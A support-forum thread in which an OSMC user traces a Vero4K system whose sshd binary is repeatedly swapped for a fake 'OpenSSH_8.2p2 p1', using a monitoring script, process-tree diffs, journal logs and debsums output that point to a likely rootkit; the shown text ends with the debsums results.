[solved] Something on OSMC is changing OpenSSH version

Filing this is an extreme long shot, but I’m stumped.

Running OSMC June 2020 2020.06-1 on a Vero4K, this is the current version of the openssh-server package:

$ apt-cache show openssh-server | head -n3
Package: openssh-server
Source: openssh
Version: 1:7.4p1-10+deb9u7

Something on the system, about every 30 minutes, is suddenly changing the sshd binary to OpenSSH_8.2p2 p1.

I’m hoping someone can help identify what is doing this.

I have a script that continually monitors the OpenSSH version, as well as changes in the system process tree:

#!/bin/bash

LAST_PROCESS_TREE=""

while true
do
        VERSION=$(/usr/sbin/sshd -d 2>&1 | head -n1)
        PROCESS_TREE=$(ps axjf | grep -v "ps axjf" | grep -v "$0")
        echo "$(date) : $VERSION"
        if [[ -n "$LAST_PROCESS_TREE" ]]
        then
                diff -up <(echo -e "$LAST_PROCESS_TREE") <(echo -e "$PROCESS_TREE")
        else
                echo -e "$PROCESS_TREE"
        fi
        LAST_PROCESS_TREE=$PROCESS_TREE

        if [[ "$VERSION" =~ 'OpenSSH_8.2' ]]
        then
                exit 0
        fi

        sleep .01s
done

I have tried to eliminate all processes in userspace that I think might be doing this, including:

  • Completely disabling my Internet connection.
  • Stopping mediacenter.service
  • Stopping docker.service
  • Stopping cron.service

But it’s still happening.

Here’s the relevant part of the script’s output from my latest run:

Sun Aug 30 18:34:33 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-30 18:34:34.166660023 -0400
+++ /dev/fd/62	2020-08-30 18:34:34.166660023 -0400
@@ -192,3 +192,7 @@
 12331 12332 12332 12332 pts/1    12453 Ss    1000   0:00      \_ -bash
 12332 12453 12453 12332 pts/1    12453 S+    1000   0:00          \_ tmux -2 attach-session
     1 29580 29580 29580 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
+    1  5098   468   468 ?           -1 S        0   0:00 /bin/bash /usr/sbin/ptty
+ 5098  5105   468   468 ?           -1 S        0   0:00  \_ /bin/bash /usr/sbin/ptty
+ 5105  5106   468   468 ?           -1 R        0   0:00      \_ w
+ 5105  5107   468   468 ?           -1 S        0   0:00      \_ tail -n+1
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-30 18:34:34.256661703 -0400
+++ /dev/fd/62	2020-08-30 18:34:34.256661703 -0400
@@ -192,7 +192,4 @@
 12331 12332 12332 12332 pts/1    12453 Ss    1000   0:00      \_ -bash
 12332 12453 12453 12332 pts/1    12453 S+    1000   0:00          \_ tmux -2 attach-session
     1 29580 29580 29580 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
-    1  5098   468   468 ?           -1 S        0   0:00 /bin/bash /usr/sbin/ptty
- 5098  5105   468   468 ?           -1 S        0   0:00  \_ /bin/bash /usr/sbin/ptty
- 5105  5106   468   468 ?           -1 R        0   0:00      \_ w
- 5105  5107   468   468 ?           -1 S        0   0:00      \_ tail -n+1
+    1  5128   468   468 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-30 18:34:34.336663195 -0400
+++ /dev/fd/62	2020-08-30 18:34:34.336663195 -0400
@@ -193,3 +193,5 @@
 12332 12453 12453 12332 pts/1    12453 S+    1000   0:00          \_ tmux -2 attach-session
     1 29580 29580 29580 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5128   468   468 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
+ 5128  5139   468   468 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
+ 5139  5140   468   468 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-30 18:34:34.596668046 -0400
+++ /dev/fd/62	2020-08-30 18:34:34.596668046 -0400
@@ -193,5 +193,4 @@
 12332 12453 12453 12332 pts/1    12453 S+    1000   0:00          \_ tmux -2 attach-session
     1 29580 29580 29580 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5128   468   468 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
- 5128  5139   468   468 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
- 5139  5140   468   468 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
+ 5128  5177   468   468 ?           -1 R        0   0:00  \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-30 18:34:34.866673084 -0400
+++ /dev/fd/62	2020-08-30 18:34:34.866673084 -0400
@@ -193,4 +193,3 @@
 12332 12453 12453 12332 pts/1    12453 S+    1000   0:00          \_ tmux -2 attach-session
     1 29580 29580 29580 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5128   468   468 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
- 5128  5177   468   468 ?           -1 R        0   0:00  \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Sun Aug 30 18:34:34 EDT 2020 : debug1: sshd version OpenSSH_8.2p2 p1
--- /dev/fd/63	2020-08-30 18:34:35.006675696 -0400
+++ /dev/fd/62	2020-08-30 18:34:35.016675882 -0400
@@ -193,3 +193,4 @@
 12332 12453 12453 12332 pts/1    12453 S+    1000   0:00          \_ tmux -2 attach-session
     1 29580 29580 29580 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5128   468   468 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
+ 5128  5256   468   468 ?           -1 R        0   0:00  \_ mount -o remount,rw /

You can see at the end the OpenSSH version suddenly changes from “7.4” to “8.2p2 p1”.

In every test, at the moment of the OpenSSH version change, I see at the same time in the process log that systemd itself (pid 1) appears to create the /bin/bash //tmp/.kworker process, which spawns the child processes mount -o remount,rw and /usr/bin/python3 -Es /usr/bin/lsb_release -s -d.

Somehow, whatever this is, it’s replacing the /usr/sbin/sshd binary. And I’m trying to get it to stop.

Please upload complete logs via grab-logs -A and share the URLso that we can get a better understanding of the system

Certainly… https://paste.osmc.tv/jahosuvinu

I rebooted the system and re-ran the test described above just before running grab-logs -A. To reset for the test, I have to kill the OpenSSH_8.2 process and run sudo apt-get install --reinstall openssh-server to reset the sshd binary back to OpenSSH_7.4, which lasts for up to 30 minutes before the event in question happens again. You’ll see a lot of openssh-server being reinstalled in the APT log.

The system journal doesn’t show much; just a single kernel message before ssh.service dies.

Aug 31 09:20:18 vero4k kernel: EXT4-fs (dm-0): re-mounted. Opts: stripe=1024,data=ordered
Aug 31 09:20:18 vero4k systemd[1]: ssh.service: Main process exited, code=killed, status=9/KILL
Aug 31 09:20:18 vero4k systemd[1]: ssh.service: Unit entered failed state.
Aug 31 09:20:18 vero4k systemd[1]: ssh.service: Failed with result 'signal'.
Aug 31 09:20:18 vero4k sshd[5390]: Server listening on 0.0.0.0 port 22.
Aug 31 09:20:18 vero4k sshd[5390]: Server listening on :: port 22.
Aug 31 09:20:18 vero4k systemd[1]: ssh.service: Service hold-off time over, scheduling restart.
Aug 31 09:20:18 vero4k systemd[1]: Stopped OpenBSD Secure Shell server.
Aug 31 09:20:18 vero4k systemd[1]: Starting OpenBSD Secure Shell server...
Aug 31 09:20:18 vero4k sshd[5500]: error: Bind to port 22 on 0.0.0.0 failed: Address already in use.
Aug 31 09:20:18 vero4k sshd[5500]: error: Bind to port 22 on :: failed: Address already in use.
Aug 31 09:20:18 vero4k systemd[1]: ssh.service: Main process exited, code=exited, status=255/n/a
Aug 31 09:20:18 vero4k sshd[5500]: fatal: Cannot bind any address.
Aug 31 09:20:18 vero4k systemd[1]: Failed to start OpenBSD Secure Shell server.
Aug 31 09:20:18 vero4k systemd[1]: ssh.service: Unit entered failed state.
Aug 31 09:20:18 vero4k systemd[1]: ssh.service: Failed with result 'exit-code'.

And here is another sampling of results from my test script, showing the moment sshd is replaced.

Mon Aug 31 09:20:17 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-31 09:20:17.503613711 -0400
+++ /dev/fd/62	2020-08-31 09:20:17.503613711 -0400
@@ -192,3 +192,6 @@
     1  3380  3379  3379 ?           -1 S     1000   0:45 /usr/bin/python /usr/bin/powerline-daemon -q
     1  4009  4009  4009 ?           -1 Ssl    105   0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 105:107
     1  5731  5731  5731 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
+    1  5217   469   469 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
+ 5217  5229   469   469 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
+ 5229  5230   469   469 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Mon Aug 31 09:20:17 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Mon Aug 31 09:20:17 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Mon Aug 31 09:20:17 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Mon Aug 31 09:20:17 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-31 09:20:17.863620566 -0400
+++ /dev/fd/62	2020-08-31 09:20:17.853620375 -0400
@@ -193,5 +193,4 @@
     1  4009  4009  4009 ?           -1 Ssl    105   0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 105:107
     1  5731  5731  5731 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5217   469   469 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
- 5217  5229   469   469 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
- 5229  5230   469   469 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
+ 5217  5284   469   469 ?           -1 R        0   0:00  \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Mon Aug 31 09:20:17 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Mon Aug 31 09:20:18 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Mon Aug 31 09:20:18 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-31 09:20:18.113625326 -0400
+++ /dev/fd/62	2020-08-31 09:20:18.113625326 -0400
@@ -193,4 +193,4 @@
     1  4009  4009  4009 ?           -1 Ssl    105   0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 105:107
     1  5731  5731  5731 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5217   469   469 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
- 5217  5284   469   469 ?           -1 R        0   0:00  \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
+ 5217  5284   469   469 ?           -1 R        0   0:00  \_ [lsb_release]
Mon Aug 31 09:20:18 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-08-31 09:20:18.203627039 -0400
+++ /dev/fd/62	2020-08-31 09:20:18.203627039 -0400
@@ -193,4 +193,3 @@
     1  4009  4009  4009 ?           -1 Ssl    105   0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 105:107
     1  5731  5731  5731 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5217   469   469 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
- 5217  5284   469   469 ?           -1 R        0   0:00  \_ [lsb_release]
Mon Aug 31 09:20:18 EDT 2020 : debug1: sshd version OpenSSH_8.2p2 p1
--- /dev/fd/63	2020-08-31 09:20:18.353629895 -0400
+++ /dev/fd/62	2020-08-31 09:20:18.353629895 -0400
@@ -193,3 +193,4 @@
     1  4009  4009  4009 ?           -1 Ssl    105   0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 105:107
     1  5731  5731  5731 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
     1  5217   469   469 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
+ 5217  5363   469   469 ?           -1 D        0   0:00  \_ mount -o remount,rw /

Could it come from one of your docker? Did you tried with all dockers disabled?

Yes, I can reproduce the event with docker.service stopped.

One thing I realize I failed to mention, and that I have not yet tried disabling, is OpenVPN.

ii  openvpn                                2.4.0-6+deb9u3                    armhf        virtual private network daemon
$ systemctl status openvpn.service
* openvpn.service - OpenVPN service
   Loaded: loaded (/lib/systemd/system/openvpn.service; enabled; vendor preset: enabled)
   Active: active (exited) since Mon 2020-08-31 08:50:16 EDT; 2h 16min ago
 Main PID: 544 (code=exited, status=0/SUCCESS)
   Memory: 0B
      CPU: 0
   CGroup: /system.slice/openvpn.service

Aug 31 08:50:16 vero4k systemd[1]: Starting OpenVPN service...
Aug 31 08:50:16 vero4k systemd[1]: Started OpenVPN service.

I’ll investigate this next and report back.

From the fact that binding to 22 fails, it would suggest another instance of SSH, possibly in a container, is taking over.

I suspect you could try disabling Docker service and rebooting and only starting Docker afterwards as a test

As you mention, and the log confirms, you ran multiple reinstalls of the openssh-server package. Did you ever check if the /usr/sbin/sshd file had actually been changed on disk, for example with a checksum?

I’ve been primarily watching the version output from /usr/sbin/sshd -d, but yes the timestamps and checksums are different:

$ /usr/sbin/sshd -d 2>&1 | head -n1                                                                                                         
debug1: sshd version OpenSSH_8.2p2 p1
$  ls -l /usr/sbin/sshd 
-rwxr-xr-x 1 root root 2938932 Feb 22  2017 /usr/sbin/sshd
$  md5sum /usr/sbin/sshd
3c9e11f2dd75888474b8a662e4d70ca4  /usr/sbin/sshd

$ sudo pkill -f sshd; sudo apt-get install --reinstall openssh-server
...

$ /usr/sbin/sshd -d 2>&1 | head -n1
debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
$ ls -l /usr/sbin/sshd
-rwxr-xr-x 1 root root 609164 Jul 15  2019 /usr/sbin/sshd
$ md5sum /usr/sbin/sshd
8fd36ed5f53a7edf12f36317b3122b94  /usr/sbin/sshd

I haven’t figured out where version 8.2 is even coming from. Only version 7.4 appears to be available from apt repositories:

$ sudo apt-get clean
$ sudo apt-get update
...
$ apt-cache show openssh-server | grep ^Version
Version: 1:7.4p1-10+deb9u7
Version: 1:7.4p1-10+deb9u6

As Sam has already mentioned you need to disable all those services you previously listed, then reboot.

If it happens again, post logs.

Unfortunately, as you already found out, auditd isn’t supported on the Vero4K kernel, though it’s there on the Pi3 kernel.

Eventually you can identify which docker container you run.
docker ps
would help. It will also show which ports are associated to that container and tell us if port 22 is in use (exposed).

Then go into the docker container and check the running sshd inside that container with your usual method. Going into the container would be done using:
docker exec -i -t [containername] /bin/sh

Here’s the event occurring again after disabling mediacenter.service, docker.service, cron.service, openvpn.service and then rebooting.

New grab-logs -A at https://paste.osmc.tv/ufotewexey

$ systemctl is-active mediacenter.service docker.service cron.service openvpn.service
inactive
inactive
inactive
inactive
$ systemctl is-enabled mediacenter.service docker.service cron.service openvpn.service
disabled
disabled
disabled
disabled

Test script output showing the moment sshd is replaced.

Tue Sep  1 08:02:51 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-09-01 08:02:51.793789856 -0400
+++ /dev/fd/62	2020-09-01 08:02:51.793789856 -0400
@@ -133,4 +133,4 @@
     1  2079  2079  2079 ?           -1 Ss    1000   0:14 /usr/bin/tmux -2 new-session -A -s 0
  2079  2107  2107  2107 pts/1     3077 Ss    1000   0:00  \_ -bash
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
-    1 21845   453   453 ?           -1 S        0   0:00 /bin/bash /usr/sbin/ptty
+    1 21877   453   453 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
Tue Sep  1 08:02:51 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-09-01 08:02:51.873791605 -0400
+++ /dev/fd/62	2020-09-01 08:02:51.873791605 -0400
@@ -134,3 +134,5 @@
  2079  2107  2107  2107 pts/1     3077 Ss    1000   0:00  \_ -bash
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
     1 21877   453   453 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
+21877 21895   453   453 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
+21895 21896   453   453 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Tue Sep  1 08:02:51 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-09-01 08:02:52.093796413 -0400
+++ /dev/fd/62	2020-09-01 08:02:52.093796413 -0400
@@ -135,4 +135,4 @@
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
     1 21877   453   453 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
 21877 21895   453   453 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
-21895 21896   453   453 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
+21895 21896   453   453 ?           -1 D        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-09-01 08:02:52.163797943 -0400
+++ /dev/fd/62	2020-09-01 08:02:52.163797943 -0400
@@ -135,4 +135,4 @@
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
     1 21877   453   453 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
 21877 21895   453   453 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
-21895 21896   453   453 ?           -1 D        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
+21895 21896   453   453 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-09-01 08:02:52.243799691 -0400
+++ /dev/fd/62	2020-09-01 08:02:52.243799691 -0400
@@ -134,5 +134,4 @@
  2079  2107  2107  2107 pts/1     3077 Ss    1000   0:00  \_ -bash
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
     1 21877   453   453 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
-21877 21895   453   453 ?           -1 S        0   0:00  \_ /bin/bash //tmp/.kworker
-21895 21896   453   453 ?           -1 R        0   0:00      \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
+21877 21958   453   453 ?           -1 R        0   0:00  \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2u  20 Dec 2019
--- /dev/fd/63	2020-09-01 08:02:52.523805810 -0400
+++ /dev/fd/62	2020-09-01 08:02:52.523805810 -0400
@@ -59,7 +59,7 @@
     2    91     0     0 ?           -1 S        0   0:00  \_ [irq/35-vsync]
     2    92     0     0 ?           -1 S        0   0:01  \_ [kthread_di]
     2    93     0     0 ?           -1 S<       0   0:00  \_ [cec_work]
-    2    94     0     0 ?           -1 S        0   0:01  \_ [kworker/3:1]
+    2    94     0     0 ?           -1 D        0   0:01  \_ [kworker/3:1]
     2    95     0     0 ?           -1 S<       0   0:00  \_ [ipv6_addrconf]
     2    97     0     0 ?           -1 S<       0   0:00  \_ [deferwq]
     2   117     0     0 ?           -1 S<       0   0:00  \_ [kdmflush]
@@ -134,4 +134,3 @@
  2079  2107  2107  2107 pts/1     3077 Ss    1000   0:00  \_ -bash
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
     1 21877   453   453 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
-21877 21958   453   453 ?           -1 R        0   0:00  \_ /usr/bin/python3 -Es /usr/bin/lsb_release -s -d
Tue Sep  1 08:02:52 EDT 2020 : ./catch-sshd.sh: line 7: /usr/sbin/sshd: Text file busy
--- /dev/fd/63	2020-09-01 08:02:52.633808214 -0400
+++ /dev/fd/62	2020-09-01 08:02:52.633808214 -0400
@@ -59,7 +59,7 @@
     2    91     0     0 ?           -1 S        0   0:00  \_ [irq/35-vsync]
     2    92     0     0 ?           -1 S        0   0:01  \_ [kthread_di]
     2    93     0     0 ?           -1 S<       0   0:00  \_ [cec_work]
-    2    94     0     0 ?           -1 D        0   0:01  \_ [kworker/3:1]
+    2    94     0     0 ?           -1 S        0   0:01  \_ [kworker/3:1]
     2    95     0     0 ?           -1 S<       0   0:00  \_ [ipv6_addrconf]
     2    97     0     0 ?           -1 S<       0   0:00  \_ [deferwq]
     2   117     0     0 ?           -1 S<       0   0:00  \_ [kdmflush]
@@ -100,6 +100,7 @@
     2  1094     0     0 ?           -1 S        0   0:00  \_ [kworker/0:0]
     2 17073     0     0 ?           -1 S        0   0:00  \_ [kworker/1:0]
     2 25418     0     0 ?           -1 S        0   0:00  \_ [kworker/2:2]
+    2 22026     0     0 ?           -1 S        0   0:00  \_ [kworker/0:1]
     0     1     1     1 ?           -1 Ss       0   0:01 /sbin/init
     1   171   171   171 ?           -1 Ss       0   0:01 /lib/systemd/systemd-journald
     1   198   198   198 ?           -1 Ss       0   0:00 /lib/systemd/systemd-udevd
Tue Sep  1 08:02:52 EDT 2020 : ./catch-sshd.sh: line 7: /usr/sbin/sshd: Text file busy
--- /dev/fd/63	2020-09-01 08:02:52.773811273 -0400
+++ /dev/fd/62	2020-09-01 08:02:52.773811273 -0400
@@ -123,14 +123,13 @@
     1   602   602   602 ?           -1 Ssl      0   0:00 /usr/lib/udisks/udisks-daemon --no-debug
   602   606   602   602 ?           -1 S        0   0:00  \_ udisks-daemon: not polling any devices
     1   607   607   607 ?           -1 Ss       0   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
-    1   608   608   608 ?           -1 Ss       0   0:00 /usr/sbin/sshd -D
-  608  2052  2052  2052 ?           -1 Ss       0   0:00  \_ sshd: osmc [priv]
- 2052  2055  2052  2052 ?           -1 S     1000   0:00      \_ sshd: osmc@pts/0
- 2055  2070  2070  2070 pts/0     2070 Ss+   1000   0:00          \_ /usr/bin/tmux -2 new-session -A -s 0
     1   615   615   615 ?           -1 Ssl      0   0:00 /usr/lib/policykit-1/polkitd --no-debug
     1   947   442   442 ?           -1 S        0   0:00 /usr/bin/hciattach -s 115200 /dev/ttyS1 bcm43xx 2000000
     1   949   949   949 ?           -1 Ss       0   0:00 /usr/libexec/bluetooth/bluetoothd
     1   974   974   974 ?           -1 Ssl    105   0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 105:107
+    1  2052  2052  2052 ?           -1 Ss       0   0:00 sshd: osmc [priv]
+ 2052  2055  2052  2052 ?           -1 S     1000   0:00  \_ sshd: osmc@pts/0
+ 2055  2070  2070  2070 pts/0     2070 Ss+   1000   0:00      \_ /usr/bin/tmux -2 new-session -A -s 0
     1  2079  2079  2079 ?           -1 Ss    1000   0:14 /usr/bin/tmux -2 new-session -A -s 0
  2079  2107  2107  2107 pts/1     3077 Ss    1000   0:00  \_ -bash
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
Tue Sep  1 08:02:52 EDT 2020 : debug1: sshd version OpenSSH_8.2p2 p1
--- /dev/fd/63	2020-09-01 08:02:52.843812803 -0400
+++ /dev/fd/62	2020-09-01 08:02:52.843812803 -0400
@@ -134,3 +134,4 @@
  2079  2107  2107  2107 pts/1     3077 Ss    1000   0:00  \_ -bash
     1  2167  2166  2166 ?           -1 S     1000   0:41 /usr/bin/python /usr/bin/powerline-daemon -q
     1 21877   453   453 ?           -1 S        0   0:00 /bin/bash //tmp/.kworker
+    1 22070 22070 22070 ?           -1 Ss       0   0:00 /usr/sbin/sshd

This test run didn’t capture the mount -o remount,rw process but the corresponding kernel message is there in the system journal immediately before ssh.service dies:

Sep 01 08:02:52 vero4k kernel: EXT4-fs (dm-0): re-mounted. Opts: stripe=1024,data=ordered

So this eliminates Docker and OpenVPN from the equation.

Appreciate the suggestions so far. I understand this phenomenon is esoteric and probably specific to my particular system setup. I’ll continue digging and post any further discoveries here.

My suspicions are now leaning toward LVM or device-mapper (perhaps within the kernel), due to the consistent remounting of dm-0 at the moment sshd is replaced.

I didn’t think it relevant before but in case it is:
My storage configuration consists of a software-controlled RAID-5 array (/dev/md127), formatted as an LVM physical volume and serving an LVM logical volume (/dev/mapper/storage-array1) mounted at /mnt/storage.

$ lsblk -f
NAME                 FSTYPE            LABEL               UUID                                   MOUNTPOINT
sda
`-sda1               linux_raid_member osmc-storage-array1 fb3dd008-ad98-9aa9-bd93-cb0c2f0f242c
  `-md127            LVM2_member                           998TFi-Jugd-TupT-sYdz-E4eo-Y7eE-I1ws32
    `-storage-array1 ext4                                  369d6fe1-5f8f-4e29-9aae-1eb64a645c2f   /mnt/storage
sdb
`-sdb1               linux_raid_member osmc-storage-array1 fb3dd008-ad98-9aa9-bd93-cb0c2f0f242c
  `-md127            LVM2_member                           998TFi-Jugd-TupT-sYdz-E4eo-Y7eE-I1ws32
    `-storage-array1 ext4                                  369d6fe1-5f8f-4e29-9aae-1eb64a645c2f   /mnt/storage
sdc
`-sdc1               linux_raid_member osmc-storage-array1 fb3dd008-ad98-9aa9-bd93-cb0c2f0f242c
  `-md127            LVM2_member                           998TFi-Jugd-TupT-sYdz-E4eo-Y7eE-I1ws32
    `-storage-array1 ext4                                  369d6fe1-5f8f-4e29-9aae-1eb64a645c2f   /mnt/storage
sdd
`-sdd1               linux_raid_member osmc-storage-array1 fb3dd008-ad98-9aa9-bd93-cb0c2f0f242c
  `-md127            LVM2_member                           998TFi-Jugd-TupT-sYdz-E4eo-Y7eE-I1ws32
    `-storage-array1 ext4                                  369d6fe1-5f8f-4e29-9aae-1eb64a645c2f   /mnt/storage
mmcblk0
mmcblk0boot0
mmcblk0boot1
mmcblk0rpmb

No - device mapper is just an additional intermediate layer between the disk and the OS to have the possibility to perform changes to the partitioning scheme live/on the fly. So no.

If your sshd is changing on the fly, and it is not inside the docker container, then you probably have a trojan horse running on your system (Note that these come with a kernel module that usually hides their presence). Can also be an add-on etc.

What you should do, is see if all files are valid on your filesystem.
For that, install debsums and run it as root.
sudo apt install debsums
sudo -ecs debsums
and check what it returns. Should only be a couple of configuration files.
If anything else is changed, you should check and consider re-installing the system from scratch.

$ sudo debsums 2>&1 | grep -v "OK$" | grep -v "missing file"
/usr/bin/scp                                                              FAILED
/usr/bin/sftp                                                             FAILED
/usr/bin/ssh                                                              FAILED
/usr/sbin/sshd                                                            FAILED

/lib/modules/3.14.29-157-osmc/modules.alias.bin                           FAILED
/lib/modules/3.14.29-157-osmc/modules.dep.bin                             FAILED
/lib/modules/3.14.29-157-osmc/modules.symbols                             FAILED
/lib/modules/3.14.29-157-osmc/modules.symbols.bin                         FAILED
/lib/modules/3.14.29-157-osmc/modules.alias                               FAILED
/lib/modules/3.14.29-157-osmc/modules.dep                                 FAILED
/lib/modules/3.14.29-158-osmc/modules.alias.bin                           FAILED
/lib/modules/3.14.29-158-osmc/modules.dep.bin                             FAILED
/lib/modules/3.14.29-158-osmc/modules.symbols                             FAILED
/lib/modules/3.14.29-158-osmc/modules.symbols.bin                         FAILED
/lib/modules/3.14.29-158-osmc/modules.alias                               FAILED
